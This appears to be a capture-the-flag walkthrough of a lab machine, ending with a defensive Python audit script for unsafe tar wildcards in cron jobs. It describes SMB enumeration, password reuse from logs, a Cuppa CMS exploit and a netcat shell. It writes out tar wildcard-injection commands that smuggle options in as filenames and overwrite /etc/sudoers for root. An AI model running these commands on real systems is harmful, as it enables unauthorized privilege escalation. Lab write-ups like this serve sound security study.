1. Scanning
The scan result is 6 services, one of them on port 80 (http):
When we find a website, we check for directories using any directory-bruteforcing tool, for example gobuster:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.6.128/
# dir = directory mode, -w = wordlist, -u = target URL
We found a directory called /squirrelmail; opening it shows a login page, so we stop there because we don't have any credentials.
2. Enumeration
The Nmap scan included a Samba service, so we should enumerate it using a tool like smbclient or smbmap. Personally I prefer smbclient, so I used it.
The anonymous share is readable by anyone; the other shares need permissions.
We notice a file called attention.txt and a folder called logs.
Logs always contain important information, so check them every time.
Reading the files, we see that attention.txt is an important message telling every user to change their password. We open the log and try the last password that was used; it's the first entry in the file.
We use the username milesdyson and the password from the logs. Then we notice an important subject line (samba password reset).
We open it and see that it includes a new password for Samba, which lets us connect to Miles's files using smbclient.
We notice a folder called notes; we open it and find a note called important.
The first note is a CMS directory and its URL. When we open it in the browser it shows us this page:
As I said at the start, we use gobuster every time to locate folders.
We found an administrator page.
When we navigate to it we notice the software running on the server: it's called Cuppa.
3. Exploit
We use searchsploit to find an exploit for it.
We found one, and it's a .txt. The exploit says that alertConfigField.php is vulnerable and we can use it to execute code; we have to add this to the URL to get a shell.
Using netcat we get an initial shell.
We navigate to the user's folder and notice something interesting.
A backup folder. Backup folders are almost always run from crontab, which means the commands in the backup file execute every few minutes.
We can use this for privilege escalation.
4. Privilege Escalation
The backup script backs up everything in /var/www/html, so we have to navigate to this folder first.
Then we use the tar wildcard injection exploit with these commands:
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > mf13.sh
# this writes a script (mf13.sh) that grants www-data passwordless sudo via /etc/sudoers
echo "/var/www/html" > "--checkpoint-action=exec=sh mf13.sh"
echo "/var/www/html" > --checkpoint=1
# the two filenames are expanded by the unquoted * in the cron job's tar command and parsed as tar options
These commands let us use sudo without a password, and with that we have privilege escalation.
Alternatively, we can use Metasploit's post/multi/recon/local_exploit_suggester module for privilege escalation.
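The root cause of this escalation is a cron job that runs tar over an unquoted wildcard. As an added defensive check, not part of the original writeup, the Python below audits a directory for filenames that tar would parse as options and flags cron commands that expand a wildcard before tar's "--" terminator; the sample directory contents and cron lines are constructed for the demo.

```python
import os
import re
import tempfile

# Constructed sample: the kind of filenames dropped into a directory that a
# cron job archives with an unquoted `tar ... *`, as this writeup shows.
SAMPLE_NAMES = ["index.php", "--checkpoint=1", "--checkpoint-action=exec=sh mf13.sh"]


def build_sample_dir():
    """Create a throwaway directory holding SAMPLE_NAMES and return its path."""
    path = tempfile.mkdtemp(prefix="tar_audit_")
    for name in SAMPLE_NAMES:
        open(os.path.join(path, name), "w").close()
    return path


def option_like_entries(directory):
    """Names in `directory` that a shell glob would hand to tar as options."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def tar_glob_is_unsafe(command):
    """True if any tar invocation in `command` expands a wildcard before '--'.

    Splits on ; && || and | so 'cd /dir && tar cf out.tgz *' is inspected.
    A '--' argument makes tar treat everything after it as file names;
    'tar cf out.tgz -C /dir .' avoids the shell glob altogether.
    """
    for segment in re.split(r"\s*(?:;|&&|\|\||\|)\s*", command):
        tokens = segment.split()
        if not tokens or os.path.basename(tokens[0]) != "tar":
            continue
        terminated = False
        for tok in tokens[1:]:
            if tok == "--":
                terminated = True
            elif "*" in tok and not terminated:
                return True
    return False


if __name__ == "__main__":
    sample = build_sample_dir()
    print("option-like names:", option_like_entries(sample))
    for line in ("cd /var/www/html; tar cf /backup.tgz *",
                 "cd /var/www/html; tar cf /backup.tgz -- *"):
        print("unsafe" if tar_glob_is_unsafe(line) else "ok", "<-", line)
```

Run the same two functions against your real web root and crontab entries; any hit means the backup job should be rewritten with "--" or with "-C dir ." and the stray files removed.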
Written By MF-13 (eng.saif@protonmail.com)